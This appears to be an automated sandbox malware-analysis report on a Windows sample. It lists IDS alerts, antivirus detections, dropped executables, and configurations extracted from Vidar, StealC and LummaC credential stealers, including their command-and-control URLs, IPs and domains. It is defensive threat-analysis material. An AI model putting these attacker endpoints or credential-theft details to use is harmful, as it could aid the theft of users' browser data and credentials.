                            2024-10-02T14:44:49.385945+020020442471Malware Command and Control Activity Detected49.12.197.9443192.168.2.658628TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-10-02T14:43:29.047007+020020518311Malware Command and Control Activity Detected49.12.197.9443192.168.2.658539TCP
                            2024-10-02T14:44:21.107891+020020518311Malware Command and Control Activity Detected49.12.197.9443192.168.2.658594TCP
                            2024-10-02T14:44:50.747083+020020518311Malware Command and Control Activity Detected49.12.197.9443192.168.2.658633TCP
                            2024-10-02T14:44:50.749556+020020518311Malware Command and Control Activity Detected49.12.197.9443192.168.2.658632TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-10-02T14:43:26.228434+020020490871A Network Trojan was detected192.168.2.65853249.12.197.9443TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-10-02T14:43:05.794996+020020442431Malware Command and Control Activity Detected192.168.2.65851546.8.231.10980TCP
                            2024-10-02T14:44:09.082576+020020442431Malware Command and Control Activity Detected192.168.2.65858046.8.231.10980TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-10-02T14:42:47.226017+020028033053Unknown Traffic192.168.2.649708104.26.12.20580TCP
                            2024-10-02T14:43:22.085706+020028033053Unknown Traffic192.168.2.649708104.26.12.20580TCP
                            2024-10-02T14:43:23.288683+020028033053Unknown Traffic192.168.2.649708104.26.12.20580TCP
                            2024-10-02T14:43:26.085649+020028033053Unknown Traffic192.168.2.658528104.26.12.20580TCP
                            2024-10-02T14:43:58.299325+020028033053Unknown Traffic192.168.2.658528104.26.12.20580TCP
                            2024-10-02T14:43:59.507617+020028033053Unknown Traffic192.168.2.658528104.26.12.20580TCP
                            2024-10-02T14:44:32.007714+020028033053Unknown Traffic192.168.2.658608104.26.12.20580TCP
                            2024-10-02T14:44:53.882992+020028033053Unknown Traffic192.168.2.658641104.26.12.20580TCP
                            2024-10-02T14:45:01.383158+020028033053Unknown Traffic192.168.2.658649104.26.12.20580TCP
                            2024-10-02T14:45:13.507905+020028033053Unknown Traffic192.168.2.658668104.26.12.20580TCP
                            2024-10-02T14:45:31.992324+020028033053Unknown Traffic192.168.2.658685104.26.12.20580TCP
                            2024-10-02T14:45:36.289243+020028033053Unknown Traffic192.168.2.658689104.26.12.20580TCP
                            2024-10-02T14:46:17.898735+020028033053Unknown Traffic192.168.2.658721104.26.12.20580TCP
                            2024-10-02T14:46:22.883133+020028033053Unknown Traffic192.168.2.658727104.26.12.20580TCP
                            2024-10-02T14:46:24.826103+020028033053Unknown Traffic192.168.2.658730104.26.12.20580TCP
                            2024-10-02T14:46:26.211283+020028033053Unknown Traffic192.168.2.658734104.26.13.20580TCP
                            2024-10-02T14:47:00.289543+020028033053Unknown Traffic192.168.2.658765104.26.13.20580TCP
                            2024-10-02T14:47:01.633315+020028033053Unknown Traffic192.168.2.658767104.26.13.20580TCP
                            2024-10-02T14:47:02.148938+020028033053Unknown Traffic192.168.2.658769104.26.13.20580TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-10-02T14:43:06.994065+020028033043Unknown Traffic192.168.2.65851546.8.231.10980TCP
                            2024-10-02T14:43:10.505057+020028033043Unknown Traffic192.168.2.65851546.8.231.10980TCP
                            2024-10-02T14:43:11.376655+020028033043Unknown Traffic192.168.2.65851546.8.231.10980TCP
                            2024-10-02T14:43:12.023945+020028033043Unknown Traffic192.168.2.65851546.8.231.10980TCP
                            2024-10-02T14:43:12.823465+020028033043Unknown Traffic192.168.2.65851546.8.231.10980TCP
                            2024-10-02T14:43:14.542466+020028033043Unknown Traffic192.168.2.65851546.8.231.10980TCP
                            2024-10-02T14:43:15.452175+020028033043Unknown Traffic192.168.2.65851546.8.231.10980TCP
                            2024-10-02T14:43:17.899197+020028033043Unknown Traffic192.168.2.658519147.45.44.10480TCP
                            2024-10-02T14:44:10.604642+020028033043Unknown Traffic192.168.2.65858046.8.231.10980TCP
                            2024-10-02T14:44:13.698145+020028033043Unknown Traffic192.168.2.65858046.8.231.10980TCP
                            2024-10-02T14:44:14.618861+020028033043Unknown Traffic192.168.2.65858046.8.231.10980TCP
                            2024-10-02T14:44:15.317179+020028033043Unknown Traffic192.168.2.65858846.8.231.10980TCP
                            2024-10-02T14:44:15.965488+020028033043Unknown Traffic192.168.2.65858846.8.231.10980TCP
                            2024-10-02T14:44:16.610197+020028033043Unknown Traffic192.168.2.65859046.8.231.10980TCP
                            2024-10-02T14:44:17.809207+020028033043Unknown Traffic192.168.2.65859046.8.231.10980TCP
                            2024-10-02T14:44:19.792937+020028033043Unknown Traffic192.168.2.658593147.45.44.10480TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-10-02T14:43:01.409630+020028032702Potentially Bad Traffic192.168.2.649725147.45.44.10480TCP
                            2024-10-02T14:43:01.458994+020028032702Potentially Bad Traffic192.168.2.649726147.45.44.10480TCP
                            2024-10-02T14:43:59.893298+020028032702Potentially Bad Traffic192.168.2.658568147.45.44.10480TCP

                            Joe Sandbox Signatures

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Antivirus / Scanner detection for submitted sample
                            Source: file.exeAvira: detected
                            Antivirus detection for URL or domain
                            Source: http://46.8.231.109/1309cdeb8f4c8736/softokn3.dllURL Reputation: Label: malware
                            Source: https://steamcommunity.com/profiles/76561199724331900URL Reputation: Label: malware
                            Source: https://steamcommunity.com/profiles/76561199724331900/inventory/URL Reputation: Label: malware
                            Source: http://46.8.231.109/URL Reputation: Label: malware
                            Source: http://46.8.231.109/1309cdeb8f4c8736/nss3.dllURL Reputation: Label: malware
                            Found malware configuration
                            Source: 00000023.00000002.2984201099.0000000000400000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "8b4d47586874b08947203f03e4db3962"}
                            Source: 19.2.RegAsm.exe.400000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://46.8.231.109/c4754d4f680ead72.php", "Botnet": "default"}
                            Source: 39.2.RegAsm.exe.400000.0.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["snarlypagowo.site", "absorptioniw.site", "mysterisop.site", "chorusarorp.site", "soldiefieop.site", "questionsmw.stor", "abnomalrkmu.site", "treatynreit.site"], "Build id": "H8NgCl--"}
                            Multi AV Scanner detection for dropped file
                            Source: C:\ProgramData\EBAEBFIIEC.exeReversingLabs: Detection: 55%
                            Source: C:\ProgramData\FIEHIIIJDA.exeReversingLabs: Detection: 60%
                            Source: C:\ProgramData\JJJEGCGDGH.exeReversingLabs: Detection: 60%
                            Source: C:\Users\userCGHCGIIDGD.exeReversingLabs: Detection: 60%
                            Source: C:\Users\userJEHDHIEGII.exeReversingLabs: Detection: 60%
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\66fbfcc9963ca_ldfsna[1].exeReversingLabs: Detection: 60%
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\66fbfcc301a31_swws[1].exeReversingLabs: Detection: 55%
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\66fbfccd837ac_vadggdsa[1].exeReversingLabs: Detection: 60%
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\66fbfcc9963ca_ldfsna[1].exeReversingLabs: Detection: 60%
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeReversingLabs: Detection: 36%
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeReversingLabs: Detection: 36%
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\f98ae5e6665140c7bc7a10ef5c598fcb.exeReversingLabs: Detection: 62%
                            Source: C:\Users\user\Documents\iofolko5\E4aR4O9hOTF5WJfvKNpcVCp8.exeReversingLabs: Detection: 60%
                            Source: C:\Users\user\Documents\iofolko5\ZNiWLZA4sT3dAjz_lF65fVs6.exeReversingLabs: Detection: 55%
                            Multi AV Scanner detection for submitted file
                            Source: file.exeReversingLabs: Detection: 36%
                            AI detected suspicious sample
                            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                            Machine Learning detection for sample
                            Source: file.exeJoe Sandbox ML: detected
                            Sample uses string decryption to hide its real strings
                            Source: 39.2.RegAsm.exe.400000.0.raw.unpackString decryptor: absorptioniw.site
                            Source: 39.2.RegAsm.exe.400000.0.raw.unpackString decryptor: mysterisop.site
                            Source: 39.2.RegAsm.exe.400000.0.raw.unpackString decryptor: snarlypagowo.site
                            Source: 39.2.RegAsm.exe.400000.0.raw.unpackString decryptor: treatynreit.site
                            Source: 39.2.RegAsm.exe.400000.0.raw.unpackString decryptor: chorusarorp.site
                            Source: 39.2.RegAsm.exe.400000.0.raw.unpackString decryptor: abnomalrkmu.site
                            Source: 39.2.RegAsm.exe.400000.0.raw.unpackString decryptor: soldiefieop.site
                            Source: 39.2.RegAsm.exe.400000.0.raw.unpackString decryptor: questionsmw.stor
                            Source: 39.2.RegAsm.exe.400000.0.raw.unpackString decryptor: chorusarorp.site
                            Source: 39.2.RegAsm.exe.400000.0.raw.unpackString decryptor: lid=%s&j=%s&ver=4.0
                            Source: 39.2.RegAsm.exe.400000.0.raw.unpackString decryptor: TeslaBrowser/5.5
                            Source: 39.2.RegAsm.exe.400000.0.raw.unpackString decryptor: - Screen Resoluton:
                            Source: 39.2.RegAsm.exe.400000.0.raw.unpackString decryptor: - Physical Installed Memory:
                            Source: 39.2.RegAsm.exe.400000.0.raw.unpackString decryptor: Workgroup: -
                            Source: 39.2.RegAsm.exe.400000.0.raw.unpackString decryptor: H8NgCl--
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0051C020 SetLastError,GetModuleHandleA,CryptGenRandom,6_2_0051C020
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0051BD80 GetModuleHandleA,CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptAcquireContextA,SetLastError,6_2_0051BD80
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0051BF40 CryptReleaseContext,6_2_0051BF40
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_00409B60 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,19_2_00409B60
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0040C820 memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcatA,lstrcatA,PK11_FreeSlot,lstrcatA,19_2_0040C820
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_00407240 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,19_2_00407240
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_00409AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,19_2_00409AC0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_00418EA0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,19_2_00418EA0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BBAA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,19_2_6BBAA9A0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BBA43B0 PK11_PubEncryptPKCS1,PR_SetError,19_2_6BBA43B0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BBD0180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,19_2_6BBD0180
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BBCA730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,19_2_6BBCA730
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BB8E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,19_2_6BB8E6E0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BB88670 PK11_ExportEncryptedPrivKeyInfo,19_2_6BB88670
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BBAA650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,19_2_6BBAA650
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BBF25B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,19_2_6BBF25B0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BBA44C0 PK11_PubEncrypt,19_2_6BBA44C0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BB74420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,19_2_6BB74420
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BBA4440 PK11_PrivDecrypt,19_2_6BBA4440
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BBCDA40 SEC_PKCS7ContentIsEncrypted,19_2_6BBCDA40
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BBA3850 PK11_Encrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,19_2_6BBA3850
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BBA9840 NSS_Get_SECKEY_EncryptedPrivateKeyInfoTemplate,19_2_6BBA9840
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BBA3FF0 PK11_PrivDecryptPKCS1,19_2_6BBA3FF0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BBC9EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo,19_2_6BBC9EC0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BBCBD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,19_2_6BBCBD30
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_6BB87D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,19_2_6BB87D60
                            Source: file.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                            Source: unknownHTTPS traffic detected: 172.67.140.92:443 -> 192.168.2.6:49709 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 173.231.16.77:443 -> 192.168.2.6:49715 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.6:49716 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.26.3.46:443 -> 192.168.2.6:58514 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:58520 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.208.141:443 -> 192.168.2.6:58521 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:58524 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 49.12.197.9:443 -> 192.168.2.6:58522 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.56.150:443 -> 192.168.2.6:58526 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.184.196:443 -> 192.168.2.6:58530 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.140.92:443 -> 192.168.2.6:58531 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.193:443 -> 192.168.2.6:58533 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.195.67:443 -> 192.168.2.6:58536 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.17.174:443 -> 192.168.2.6:58538 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:58541 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.16.12:443 -> 192.168.2.6:58543 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.208.141:443 -> 192.168.2.6:58573 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:58575 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.56.150:443 -> 192.168.2.6:58576 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.184.196:443 -> 192.168.2.6:58577 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.193:443 -> 192.168.2.6:58579 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.195.67:443 -> 192.168.2.6:58582 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.17.174:443 -> 192.168.2.6:58583 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:58585 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:58586 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 49.12.197.9:443 -> 192.168.2.6:58587 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.208.141:443 -> 192.168.2.6:58595 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:58599 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.56.150:443 -> 192.168.2.6:58600 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.184.196:443 -> 192.168.2.6:58601 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.193:443 -> 192.168.2.6:58605 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.195.67:443 -> 192.168.2.6:58607 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.17.174:443 -> 192.168.2.6:58611 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:58615 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.16.12:443 -> 192.168.2.6:58617 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:58618 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:58619 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 49.12.197.9:443 -> 192.168.2.6:58620 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 49.12.197.9:443 -> 192.168.2.6:58621 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.140.92:443 -> 192.168.2.6:58650 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.140.92:443 -> 192.168.2.6:58657 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.140.92:443 -> 192.168.2.6:58669 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.140.92:443 -> 192.168.2.6:58674 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.140.92:443 -> 192.168.2.6:58693 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.140.92:443 -> 192.168.2.6:58695 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.140.92:443 -> 192.168.2.6:58697 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.140.92:443 -> 192.168.2.6:58708 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.140.92:443 -> 192.168.2.6:58728 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.140.92:443 -> 192.168.2.6:58750 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.140.92:443 -> 192.168.2.6:58760 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.140.92:443 -> 192.168.2.6:58766 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.140.92:443 -> 192.168.2.6:58770 version: TLS 1.2
                            Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Source: Binary string: mozglue.pdbP source: RegAsm.exe, 00000013.00000002.2847784623.000000006BE5D000.00000002.00000001.01000000.00000011.sdmp, RegAsm.exe, 00000023.00000002.3066218215.0000000028ECC000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: freebl3.pdb source: RegAsm.exe, 00000023.00000002.3060192324.0000000022F54000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb source: LKMService.exe, 00000007.00000002.2290894596.0000000001233000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdater.exe, 00000012.00000002.2373356636.0000000001078000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: LKMService.exe, 00000017.00000002.2453266873.0000000000FA6000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb! source: LKMService.exe, 00000017.00000002.2453266873.0000000000FA6000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: nss3.pdb@ source: RegAsm.exe, 00000013.00000002.2838853417.000000006BC7F000.00000002.00000001.01000000.00000010.sdmp, RegAsm.exe, 00000023.00000002.3104338698.0000000040C89000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.19.dr
                            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb\ source: LKMService.exe, 00000017.00000002.2453266873.0000000000FA6000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\System.pdbpdbtem.pdb source: GoogleUpdater.exe, 00000012.00000002.2373356636.0000000001078000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: GoogleUpdater.exe, 00000012.00000002.2373356636.0000000001078000.00000004.00000020.00020000.00000000.sdmp, LKMService.exe, 00000017.00000002.2453266873.0000000000FA6000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: \??\C:\Windows\mscorlib.pdbR source: GoogleUpdater.exe, 00000012.00000002.2373356636.0000000001078000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: LKMService.exe, 00000007.00000002.2290894596.0000000001263000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: \??\C:\Windows\System.pdb# source: LKMService.exe, 00000017.00000002.2453266873.0000000000F0C000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: softokn3.pdb@ source: RegAsm.exe, 00000023.00000002.3086066708.0000000034DAE000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.19.dr
                            Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: RegAsm.exe, 00000023.00000002.3092204683.000000003AD1A000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: LKMService.exe, 00000017.00000002.2453266873.0000000000FBD000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: RegAsm.exe, 00000023.00000002.3078174004.000000002EE39000.00000004.00000020.00020000.00000000.sdmp, msvcp140[1].dll.19.dr
                            Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.PDB7 source: LKMService.exe, 00000017.00000002.2453266873.0000000000FA6000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbM>t source: LKMService.exe, 00000017.00000002.2453266873.0000000000FA6000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: mozglue.pdb source: RegAsm.exe, 00000013.00000002.2847784623.000000006BE5D000.00000002.00000001.01000000.00000011.sdmp, RegAsm.exe, 00000023.00000002.3066218215.0000000028ECC000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdbfq source: LKMService.exe, 00000017.00000002.2453266873.0000000000F0C000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: \??\C:\Windows\System.pdb source: LKMService.exe, 00000007.00000002.2290894596.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdater.exe, 00000012.00000002.2373356636.0000000001078000.00000004.00000020.00020000.00000000.sdmp, LKMService.exe, 00000017.00000002.2453266873.0000000000F0C000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: LKSM.pdb source: file.exe, 00000000.00000002.2124493240.0000000002C90000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: \??\C:\Windows\mscorlib.pdbb source: GoogleUpdater.exe, 00000012.00000002.2373356636.0000000001078000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\System.Core.pdbpdbore.pdb source: LKMService.exe, 00000007.00000002.2290894596.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, LKMService.exe, 00000017.00000002.2453266873.0000000000F0C000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: \??\C:\Windows\mscorlib.pdb(z source: LKMService.exe, 00000007.00000002.2290894596.00000000011A6000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdburat source: LKMService.exe, 00000007.00000002.2290894596.00000000011A6000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: \??\C:\Windows\System.Core.pdbF> source: LKMService.exe, 00000017.00000002.2453266873.0000000000FA6000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: freebl3.pdbp source: RegAsm.exe, 00000023.00000002.3060192324.0000000022F54000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: \??\C:\Windows\dll\System.pdb source: LKMService.exe, 00000007.00000002.2290894596.0000000001263000.00000004.00000020.00020000.00000000.sdmp
